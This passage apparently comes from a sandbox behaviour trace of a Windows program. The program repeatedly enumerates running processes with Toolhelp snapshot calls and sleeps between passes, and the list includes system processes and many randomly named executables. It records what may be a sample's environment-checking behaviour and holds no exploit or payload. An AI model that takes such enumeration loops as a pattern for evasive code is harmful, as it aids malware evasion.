lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0110.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0110.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0110.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.143] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.144] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.145] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.146] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.147] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.148] CloseHandle (hObject=0xbc) returned 1 [0110.148] Sleep (dwMilliseconds=0x12c) [0110.457] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.463] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 
dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.464] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="services.exe")) returned 1 [0110.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0110.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.482] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="taskeng.exe")) returned 1 [0110.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.485] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.507] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.510] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.511] 